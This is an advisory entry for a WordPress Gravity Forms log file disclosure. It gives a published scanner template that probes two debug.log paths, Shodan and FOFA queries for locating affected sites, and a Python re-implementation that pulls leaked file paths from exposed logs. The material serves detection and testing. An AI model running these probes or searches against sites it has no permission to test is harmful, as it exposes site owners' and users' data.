wp-gravity-forms-log-disclosure: WordPress Gravity Forms - Log File Disclosure

Date: 2026-01-16 | Affected software: WordPress Gravity Forms | PoC: published

Vulnerability description

The Gravity Forms plugin for WordPress writes its log files into directories that the web server serves directly, so they may be readable without authentication. When logging is enabled, debug and error logs are created in the wp-content/uploads/gravity_forms/logs/ directory. These logs can contain sensitive information including form submission data, file paths, database queries, PHP errors, API keys, and user information. Note that the template below does not request that directory: it probes debug.log and tmp/debug.log under wp-content/plugins/gravityforms/ and reports a hit only when all three conditions hold: the response is HTTP 200, the body carries PHP's default error-log line prefix (for example "[16-Jan-2026 12:00:00 UTC] PHP"), and the body contains one of the listed warning or notice markers. A 200 response without that prefix (a soft 404) is therefore not reported, and a readable log under the uploads directory is outside the scope of this check.

PoC code [published]

id: wp-gravity-forms-log-disclosure

info:
  name: WordPress Gravity Forms - Log File Disclosure
  author: ritikchaddha
  severity: low
  description: |
    The Gravity Forms plugin for WordPress stores log files that may be accessible without authentication. When logging is enabled, debug and error logs are created in the wp-content/uploads/gravity_forms/logs/ directory. These logs can contain sensitive information including form submission data, file paths, database queries, PHP errors, API keys, and user information.
  metadata:
    max-request: 2
    verified: true
    shodan-query: html:"/wp-content/plugins/gravityforms"
    fofa-query: body="/wp-content/plugins/gravityforms"
  tags: wordpress,wp,wp-plugin,gravityforms,log,disclosure,exposure,misconfig

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/gravityforms/debug.log"
      - "{{BaseURL}}/wp-content/plugins/gravityforms/tmp/debug.log"

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'regex("[[0-9]{2}-[a-zA-Z]{3}-[0-9]{4} [0-9]{2}:[0-9]{2}:[0-9]{2} [A-Z]{3}] PHP", body)'
          - 'contains_any(body, "PHP Warning:", "PHP Notice:", "Undefined array", "Undefined variable")'
        condition: and
# digest: 4a0a0047304502203ee743b1dfba16198d2fb8f894f6389ffe369426f3108845046e723551acb700022100a67dc8f2308aabba5e5d2421138e4eb8a202e67cf7f5ada9161728e94271faaf:922c64590222798bb761d5b6d8e72950
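The following is an added example, not part of the published template or of Gravity Forms: a stand-alone Python re-implementation of the template's matcher logic (status 200 AND PHP error-log line prefix AND one of the warning/notice markers, probing the two paths in order and stopping at the first match). It runs offline against constructed sample responses; the fake_responses function, the sample log text, the example.invalid host and the sensitive_paths helper are all assumptions introduced here. The bracket characters in the timestamp regex are escaped explicitly, whereas the template's pattern relies on the RE2 engine treating the stray "]" as a literal.

```python
"""Offline re-implementation of the wp-gravity-forms-log-disclosure matcher.

Added example; not the template's own code. Sample responses are constructed.
"""
from __future__ import annotations

import re
from typing import Callable, Optional

# Relative paths probed by the template, in order.
PROBE_PATHS = (
    "/wp-content/plugins/gravityforms/debug.log",
    "/wp-content/plugins/gravityforms/tmp/debug.log",
)

# PHP's default error_log prefix, e.g. "[16-Jan-2026 12:34:56 UTC] PHP ...".
# Brackets are escaped here; the template's pattern leans on RE2 literal handling.
PHP_LOG_PREFIX = re.compile(
    r"\[[0-9]{2}-[A-Za-z]{3}-[0-9]{4} [0-9]{2}:[0-9]{2}:[0-9]{2} [A-Z]{3}\] PHP"
)

# contains_any(...) markers from the template.
ERROR_MARKERS = ("PHP Warning:", "PHP Notice:", "Undefined array", "Undefined variable")

Fetcher = Callable[[str], tuple[int, str]]


def matches(status_code: int, body: str) -> bool:
    """All three template conditions must hold (condition: and)."""
    return (
        status_code == 200
        and PHP_LOG_PREFIX.search(body) is not None
        and any(marker in body for marker in ERROR_MARKERS)
    )


def scan(base_url: str, fetch: Fetcher) -> Optional[str]:
    """Probe each path; return the first matching URL (stop-at-first-match) or None."""
    for path in PROBE_PATHS:
        url = base_url.rstrip("/") + path
        status, body = fetch(url)
        if matches(status, body):
            return url
    return None


def sensitive_paths(body: str) -> list[str]:
    """Extract absolute .php paths leaked by the log (the 'file paths' the description mentions)."""
    return sorted(set(re.findall(r" in (/\S+\.php) on line", body)))


def http_fetch(url: str, timeout: float = 10.0) -> tuple[int, str]:
    """Real GET, for use only against a host you are authorised to test."""
    import urllib.error
    import urllib.request

    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.status, resp.read(65536).decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, ""


# Constructed sample responses (not captured from any real site).
SAMPLE_LOG = (
    '[16-Jan-2026 09:12:43 UTC] PHP Warning:  Undefined array key "form_id" in '
    "/var/www/html/wp-content/plugins/gravityforms/form_display.php on line 120\n"
    "[16-Jan-2026 09:12:44 UTC] PHP Notice:  Undefined variable: entry in "
    "/var/www/html/wp-content/plugins/gravityforms/common.php on line 88\n"
)
SAMPLE_404 = "<html><body>404 Not Found</body></html>"
# A soft 404: HTTP 200 and a marker string, but no PHP log prefix -> must not match.
SAMPLE_SOFT_404 = "<html><body>Page not found. PHP Warning: nothing here</body></html>"


def fake_responses(url: str) -> tuple[int, str]:
    """Offline stand-in for http_fetch: only the tmp/ path serves a real log."""
    if url.endswith("/gravityforms/tmp/debug.log"):
        return 200, SAMPLE_LOG
    if url.endswith("/gravityforms/debug.log"):
        return 200, SAMPLE_SOFT_404
    return 404, SAMPLE_404


if __name__ == "__main__":
    hit = scan("https://example.invalid", fake_responses)
    print("matched:", hit)
    if hit:
        _, body = fake_responses(hit)
        print("leaked paths:", sensitive_paths(body))
```

Swap fake_responses for http_fetch to run the same logic against a target you are permitted to test. The soft-404 sample shows why the template requires the timestamp prefix in addition to the marker strings: a generic error page that happens to echo "PHP Warning:" would otherwise produce a false positive.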
